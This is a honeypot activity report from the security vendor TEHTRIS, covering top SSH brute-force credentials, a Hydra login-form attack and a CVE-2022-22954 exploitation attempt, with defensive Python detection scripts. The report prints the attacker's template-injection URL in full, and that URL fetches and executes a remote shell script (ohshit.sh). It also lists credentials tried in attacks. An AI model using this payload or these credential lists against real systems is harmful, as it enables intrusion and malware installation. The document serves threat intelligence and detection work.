
Honeypots: activity of the week 50

More than 116,000 different IP addresses interacted with the TEHTRIS honeypots deployed in Europe this week. Unsurprisingly, the countries of origin of the most active IP addresses are the United States (23%), the Netherlands (15%), China (7%), Russia (7%) and Bulgaria (6%), the same prevalent origins as observed in previous weeks.

TEHTRIS shares the top 10 logins and passwords used by attackers and looks at two different types of attack: one relying on an automated credential-testing tool (Hydra), the other attempting to exploit a recent VMware vulnerability.

Top 10 logins and passwords used by attackers

This week, TEHTRIS shares the top 10 most common logins and passwords used by attackers in brute-force attacks against SSH:

Passwords (most frequent first):
1. 345gs5662d34
2. 3245gs5662d34
3. 123456
4. admin
5. 1234
6. password
7. 123
8. 12345
9. 12345678
10. root

Logins (most frequent first):
1. 345gs5662d34
2. root
3. admin
4. ubuntu
5. test
6. user
7. postgres
8. oracle
9. ftpuser
10. git

This week, the password 345gs5662d34 (and its variant 3245gs5662d34) accounted for more than 30% of all attempts observed, ahead of the classic "admin", "root" or "password". More than 7,400 different IP addresses tested these two passwords. As a reminder, this password was first observed on TEHTRIS honeypots last week.
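The statistics above (top logins, top passwords, the share of attempts taken by one password and the number of distinct sources behind it) can be reproduced from any honeypot's login events. The script below is an added example, not TEHTRIS code: it assumes one JSON event per line in the style of a Cowrie SSH honeypot (eventid, src_ip, username, password), and the sample events it embeds are constructed for illustration; only the credential values come from the report.

```python
"""Tally logins and passwords in SSH brute-force traffic (added example, not TEHTRIS code).

Assumed input: newline-delimited JSON in Cowrie style, e.g.
  {"eventid": "cowrie.login.failed", "src_ip": "...", "username": "...", "password": "..."}
"""
import json
from collections import Counter, defaultdict

# Constructed sample events (not real honeypot data); credentials are those listed in the report.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"eventid": "cowrie.login.failed", "src_ip": "203.0.113.5", "username": "345gs5662d34", "password": "345gs5662d34"},
    {"eventid": "cowrie.login.failed", "src_ip": "203.0.113.5", "username": "root", "password": "3245gs5662d34"},
    {"eventid": "cowrie.login.failed", "src_ip": "198.51.100.7", "username": "root", "password": "345gs5662d34"},
    {"eventid": "cowrie.login.failed", "src_ip": "198.51.100.7", "username": "admin", "password": "123456"},
    {"eventid": "cowrie.login.failed", "src_ip": "192.0.2.9", "username": "ubuntu", "password": "password"},
    {"eventid": "cowrie.login.failed", "src_ip": "192.0.2.9", "username": "root", "password": "admin"},
    {"eventid": "cowrie.session.connect", "src_ip": "192.0.2.9"},  # not a login attempt: ignored
    {"eventid": "cowrie.login.failed", "src_ip": "192.0.2.10", "username": "postgres", "password": "345gs5662d34"},
])

LOGIN_EVENTS = ("cowrie.login.failed", "cowrie.login.success")


def parse_login_attempts(text):
    """Yield (src_ip, username, password) for each login event; skip blank or malformed lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # a truncated line must not abort the whole tally
        if ev.get("eventid") not in LOGIN_EVENTS:
            continue
        yield ev.get("src_ip", ""), ev.get("username", ""), ev.get("password", "")


def credential_stats(text):
    """Count every login and password tried, and remember which sources tried each password."""
    logins, passwords = Counter(), Counter()
    ips_by_password = defaultdict(set)
    total = 0
    for ip, user, pw in parse_login_attempts(text):
        total += 1
        logins[user] += 1
        passwords[pw] += 1
        ips_by_password[pw].add(ip)
    return {"total": total, "logins": logins, "passwords": passwords, "ips_by_password": ips_by_password}


def top(counter, n=10):
    """Top-n list in the report's format: [(value, count), ...], most frequent first."""
    return counter.most_common(n)


def password_share(stats, *pwds):
    """Fraction of all attempts that used any of the given passwords, plus the distinct source IPs."""
    hits = sum(stats["passwords"][p] for p in pwds)
    ips = set().union(*(stats["ips_by_password"][p] for p in pwds))
    share = hits / stats["total"] if stats["total"] else 0.0
    return share, ips


if __name__ == "__main__":
    s = credential_stats(SAMPLE_LOG)
    print("top logins:", top(s["logins"]))
    print("top passwords:", top(s["passwords"]))
    share, ips = password_share(s, "345gs5662d34", "3245gs5662d34")
    print(f"345gs5662d34 + variant: {share:.0%} of attempts from {len(ips)} distinct IPs")
```

The distinct-IP count is the more useful figure: a password that appears in thousands of attempts from a handful of sources is one noisy bot, whereas the same password spread across thousands of sources (7,400 here) points to a shared wordlist or a common botnet, which is what makes it worth tracking week over week.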

Burst of attacks targeting Irish infrastructure

This week, a single UK IP address was responsible for more than 80% of the total web activity on the TEHTRIS honeypots. The activity was concentrated on 13/12/22 between 15:20 and 16:00. It originated from 139.162.236[.]147 (AS63949, LINODE LLC) and targeted exclusively an infrastructure located in Ireland.

More than 99% of its requests target the URL /login.php with a form body (RawData) such as:

tgroup=&next=&tgcookieset=&group_list=&prod_login=root&prod_pass=111187&Login=Login

or

prod_login=admin&prod_pass=0000&Login=Login

The prod_login and prod_pass values change on each request, and every request carries the User-Agent Mozilla/5.0 (Hydra).

Hydra is a parallelised network login cracker published as a proof of concept to show how easy it is to gain unauthorised access to a remote system. It automatically tests predefined login/password lists against many protocols, including HTTP form logins as seen here. According to its creator, it should only be used for vulnerability research in the context of audits or legal penetration tests. Note that the "Mozilla/5.0 (Hydra)" User-Agent is simply the tool's default and is trivial to change, so it is a convenient signature but not one to rely on: the request rate and the repeated submission of the same form with varying credentials are the robust indicators.

This example illustrates the fine line between legitimate and abusive use of a pentest tool, and how readily such tools are repurposed by malicious actors.
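The burst described above can be caught with two checks on web logs: the Hydra User-Agent string, and a sliding-window count of POSTs to the login page per source IP, which still fires when the tool's User-Agent has been changed. The script below is an added example, not TEHTRIS code; its log format is an assumption (one request per line, tab-separated: timestamp, source IP, method, path, User-Agent, POST body, roughly what a web honeypot records as RawData), and the log lines are constructed. The IP, path, form fields and User-Agent are those reported above; the window and threshold are assumed values to tune per site.

```python
"""Detect web-form brute forcing of the kind described above (added example, not TEHTRIS code).

Assumed log format, one request per line:
  <ISO-8601 timestamp>\t<src ip>\t<method>\t<path>\t<user agent>\t<post body>
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import parse_qs

HYDRA_UA_MARK = "(Hydra)"        # Hydra's stock User-Agent is "Mozilla/5.0 (Hydra)"; easily changed
WINDOW = timedelta(seconds=60)   # assumption: sliding window for the rate check
THRESHOLD = 20                   # assumption: login POSTs per window from one IP that count as a burst

# Constructed sample: 24 Hydra-style POSTs two seconds apart, plus benign traffic from another host.
HYDRA_LINES = [
    ("2022-12-13T15:20:{:02d}Z\t139.162.236.147\tPOST\t/login.php\tMozilla/5.0 (Hydra)\t"
     "tgroup=&next=&tgcookieset=&group_list=&prod_login={}&prod_pass={}&Login=Login").format(2 * i, u, p)
    for i, (u, p) in enumerate([("root", "111187"), ("admin", "0000")] * 12)
]
BENIGN_LINES = [
    "2022-12-13T15:24:00Z\t198.51.100.7\tGET\t/index.html\tMozilla/5.0\t",
    "2022-12-13T15:24:05Z\t198.51.100.7\tPOST\t/login.php\tMozilla/5.0\tprod_login=alice&prod_pass=hunter2&Login=Login",
]
SAMPLE_LOG = "\n".join(HYDRA_LINES + BENIGN_LINES)


def parse_requests(text):
    """Yield one dict per request; lines that do not have all six fields are skipped."""
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split("\t", 5)
        if len(fields) != 6:
            continue
        ts, ip, method, path, ua, body = fields
        yield {"ts": datetime.fromisoformat(ts.replace("Z", "+00:00")), "ip": ip,
               "method": method, "path": path, "ua": ua, "body": body}


def detect_form_bruteforce(text, login_path="/login.php", window=WINDOW, threshold=THRESHOLD):
    """Return {ip: report} for sources that present a tool User-Agent or exceed the POST rate."""
    recent = defaultdict(deque)   # ip -> timestamps of login POSTs inside the sliding window
    reports = {}
    for r in parse_requests(text):
        if r["method"] != "POST" or r["path"] != login_path:
            continue
        q = recent[r["ip"]]
        q.append(r["ts"])
        while r["ts"] - q[0] > window:   # drop timestamps that fell out of the window
            q.popleft()
        creds = parse_qs(r["body"], keep_blank_values=True)
        user = creds.get("prod_login", [""])[0]
        pw = creds.get("prod_pass", [""])[0]
        rep = reports.setdefault(r["ip"], {"tool_ua": False, "burst": False, "attempts": 0, "creds": []})
        rep["attempts"] += 1
        rep["creds"].append((user, pw))
        if HYDRA_UA_MARK in r["ua"]:
            rep["tool_ua"] = True
        if len(q) >= threshold:
            rep["burst"] = True
    return {ip: rep for ip, rep in reports.items() if rep["tool_ua"] or rep["burst"]}


if __name__ == "__main__":
    for ip, rep in detect_form_bruteforce(SAMPLE_LOG).items():
        print(ip, "tool_ua=%s burst=%s attempts=%d distinct_creds=%d"
              % (rep["tool_ua"], rep["burst"], rep["attempts"], len(set(rep["creds"]))))
```

Keeping the (login, password) pairs in the report is deliberate: beyond blocking the source, the list tells you which accounts were targeted and whether any of the tried passwords belongs to a real user, which decides whether the incident is a failed scan or a compromise.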

Attempted exploitation of a VMware vulnerability

The US-registered IP 195.178.120[.]13 (AS211252, DELIS LLC), never observed on our honeypot network before 16/12/22, scanned all TEHTRIS European honeypots for CVE-2022-22954 (CVSSv3 9.8), a server-side template injection in VMware Workspace ONE Access and VMware Identity Manager that allows remote code execution.

URL:

/catalog-portal/ui/oauth/verify?error=&deviceUdid%3D%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F195.178.120.130%2Fohshit.sh%3B%20chmod%20777%20ohshit.sh%3B%20sh%20ohshit.sh%22%29%7D

URL decode:

/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cd /tmp; wget http[:]//195.178.120[.]130/ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh")}

Here, the attacker seeks to fetch and execute the file ohshit.sh from http[:]//195.178.120[.]130/ohshit.sh. That file has been known to the VirusTotal platform since 16/12/22, the same day it was first observed on TEHTRIS honeypots. The IP 195.178.120[.]130, also registered with AS211252 (DELIS LLC), itself targeted the honeypots directly, attempting to exploit the path-traversal vulnerability in Apache HTTP Server 2.4.49, CVE-2021-41773 (CVSSv3 7.5).
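Requests of this shape are easy to flag once decoded: the Freemarker expression ${"freemarker.template.utility.Execute"?new()("...")} has no legitimate reason to appear in a deviceUdid parameter, and the command it wraps carries the download URL that matters for blocking and hunting. The script below is an added example, not TEHTRIS or VMware code. It decodes the observed request (the encoded URL quoted above, copied as-is), repeating the decoding to defeat double encoding, extracts the injected shell command and pulls out the URLs and hosts as indicators; the only assumption is the regular expression for the Execute pattern, which matches the textbook CVE-2022-22954 payload and not necessarily every obfuscated variant.

```python
"""Decode a CVE-2022-22954-style request and extract the injected command and download IOCs
(added example, not TEHTRIS or VMware code)."""
import re
from urllib.parse import unquote, urlsplit

# The request observed on the honeypots, exactly as quoted in the report (encoded form).
OBSERVED_REQUEST = (
    "/catalog-portal/ui/oauth/verify?error=&deviceUdid%3D%24%7B%22freemarker.template.utility.Execute"
    "%22%3Fnew%28%29%28%22cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F195.178.120.130%2Fohshit.sh%3B%20chmod"
    "%20777%20ohshit.sh%3B%20sh%20ohshit.sh%22%29%7D"
)

# Textbook Execute-based SSTI payload (assumption: obfuscated variants need extra patterns).
TEMPLATE_RE = re.compile(
    r'\$\{\s*"freemarker\.template\.utility\.Execute"\s*\?new\(\)\s*\(\s*"(?P<cmd>.*?)"\s*\)\s*\}', re.S)
URL_RE = re.compile(r'https?://[^\s"\'<>;|&]+')


def decode_request(raw, max_rounds=3):
    """URL-decode until the string stops changing (bounded), then split into path and query."""
    decoded = raw
    for _ in range(max_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    parts = urlsplit(decoded)
    return parts.path, parts.query


def analyse_request(raw):
    """Return a verdict plus the injected command and any download URLs/hosts it references."""
    path, query = decode_request(raw)
    m = TEMPLATE_RE.search(query)
    if not m:
        return {"path": path, "ssti": False, "command": None, "urls": [], "hosts": []}
    cmd = m.group("cmd")
    urls = URL_RE.findall(cmd)
    hosts = [urlsplit(u).hostname for u in urls]
    return {"path": path, "ssti": True, "command": cmd, "urls": urls, "hosts": hosts}


if __name__ == "__main__":
    verdict = analyse_request(OBSERVED_REQUEST)
    print("SSTI:", verdict["ssti"])
    print("command:", verdict["command"])
    print("download hosts:", verdict["hosts"])
```

Decoding repeatedly is what makes the check worthwhile: a single unquote would still see %24%7B for a double-encoded payload and miss it. The bound on rounds keeps a pathological input from being decoded indefinitely.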

A large campaign is currently targeting IoT devices with a script called "ohshit.sh", for example the sample with SHA-256 3cbe17bc00e637be7885542ce4bfd54296c11783376dca54fa157ef2811b88f9.

[Figure: contents of the script with SHA-256 3cbe17bc00e637be7885542ce4bfd54296c11783376dca54fa157ef2811b88f9]

This script is flagged as malicious in public databases and is associated with the Mirai malware family, like several items reviewed in our other reports. Here, the attacker seeks a writable directory to operate from (/tmp, /var/run, etc.), then downloads a binary for each architecture (ARM, MIPS, x86, ...) from IP 193.35.18[.]225 (US, AS202685, Aggros Operations Ltd) in order to execute a script called "WTF".